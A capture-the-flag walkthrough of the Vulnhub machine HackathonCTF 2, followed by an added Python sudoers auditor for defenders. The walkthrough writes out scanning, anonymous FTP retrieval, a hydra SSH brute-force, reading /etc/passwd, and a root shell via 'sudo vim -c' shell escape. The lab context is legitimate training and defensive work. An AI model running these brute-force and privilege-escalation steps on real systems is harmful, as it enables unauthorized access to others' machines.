HackathonCTF 2 Walkthrough – Vulnhub – Writeup
There is a new beginner-level CTF challenge on Vulnhub. The author of the machine is Somu Sen. Also, I am trying the machine on VMware Workstation Player.
Link to the machine: https://www.vulnhub.com/entry/hackathonctf-2,714/
Identify the target
Firstly, I had to identify the IP address of the target machine.
fping -aqg 192.168.19.0/24

Scan open ports
Next, I scanned the open ports to know the exposed services.
nmap -T4 -sC -sV -p- --min-rate=1000 -oN nmap.log 192.168.19.141

Firstly, anonymous FTP access is allowed. Then, it is evident from the scan results that there is a dictionary file which we can use to brute-force different logins. My plan was to use the dictionary list to brute-force the SSH service running on port 7223. So, I logged in to the FTP server.
ftp 192.168.19.141
ls -al
get flag1.txt
get word.dir

cat flag1.txt

Now that I have the wordlist, I require a username to brute-force. For this, I enumerated the web server.
Enumerate web server
gobuster dir -u http://192.168.19.141 -x html,txt,php --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o dir.log
During the scanning, I found a URL path /happy.


The URL said there was nothing in there. However, when I looked at the source, I found a username.

Now, I have a username and a wordlist. So, I can brute-force now.
Bruteforce using hydra
Hydra is a tool for online brute-forcing. There are also offline password-cracking tools, such as John the Ripper.
hydra -V -l hackathonll -P word.dir 192.168.19.141 ssh -s 7223

Finally, I got the credentials of the SSH login.
ssh hackathonll@192.168.19.141 -p 7223

However, this is not the user that had the flag. So, I looked up the users on the machine.
cat /etc/passwd | grep bash

We can see that there is another user called dobash. Thus, I had to try to get his shell. But before that, you can see that the shell isn’t the bash shell. So, let’s switch to that.
bash

However, while searching for the next clue, I looked at my sudo permissions.
sudo -l

Luckily, we could use vim as root without requiring the password of root. If we look at GTFOBins, we learn that vim allows execution of shell commands.
Reference: https://gtfobins.github.io/gtfobins/vim/
sudo vim -c ':!/bin/bash'

Finally, I got the root shell and the root flag.
cd /root/
ls
cat flag2.txt

Also, there is nothing in dobash. It was there to divert my mind.
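From the defender's side, the sudo rule that made this possible (vim runnable as root without a password) is something a sudoers audit can catch. The following is an added example, not part of the original writeup or the machine: a simplified sudoers parser that flags editors and pagers with a shell escape unless the rule carries the NOEXEC tag. The binary list and the sample sudoers content are assumptions constructed for the demo.

```python
import re

# Assumption: editors/pagers with a built-in shell escape (vim's ":!" is the
# one used in this walkthrough). Extend the set for your own environment.
SHELL_ESCAPE_BINARIES = {"vi", "vim", "view", "less", "more", "man"}
SKIP_PREFIXES = ("Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias")
TAG_RE = re.compile(r"^((?:[A-Z_]+:\s*)*)(.*)$")

# Constructed sudoers content for the demo; not copied from the target machine.
SAMPLE_SUDOERS = """\
# constructed example
Defaults env_reset
root    ALL=(ALL:ALL) ALL
alice   ALL=(root) NOPASSWD: /usr/bin/vim
bob     ALL=(root) NOEXEC: /usr/bin/vim /etc/motd
carol   ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx, /usr/bin/less /var/log/syslog
dave    ALL=(root) sudoedit /etc/hosts
"""


def audit_sudoers(text):
    """Return (line_no, user, binary, nopasswd) for rules that allow a shell escape."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()  # simplified: ignores #include and #uid forms
        if not line or "=" not in line or line.startswith(SKIP_PREFIXES):
            continue
        left, right = line.split("=", 1)
        user = left.split()[0]
        right = re.sub(r"^\s*\([^)]*\)\s*", "", right)  # drop the (runas) part
        noexec = nopasswd = False  # tags carry over to later commands in the list
        for item in right.split(","):
            tag_text, command = TAG_RE.match(item.strip()).groups()
            for tag in re.findall(r"[A-Z_]+", tag_text):
                if tag in ("NOEXEC", "EXEC"):
                    noexec = tag == "NOEXEC"
                elif tag in ("NOPASSWD", "PASSWD"):
                    nopasswd = tag == "NOPASSWD"
            binary = (command.split() or [""])[0]
            if binary.rsplit("/", 1)[-1] in SHELL_ESCAPE_BINARIES and not noexec:
                findings.append((line_no, user, binary, nopasswd))
    return findings


if __name__ == "__main__":
    for line_no, user, binary, nopasswd in audit_sudoers(SAMPLE_SUDOERS):
        auth = "no password" if nopasswd else "password required"
        print(f"line {line_no}: {user} may run {binary} as root ({auth})")
```

For a flagged rule, granting `sudoedit` on the specific file or adding the `NOEXEC` tag keeps the editing ability without handing out a root shell.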
Conclusion
This is a very beginner-level machine. Hence, you can crack this within a few minutes.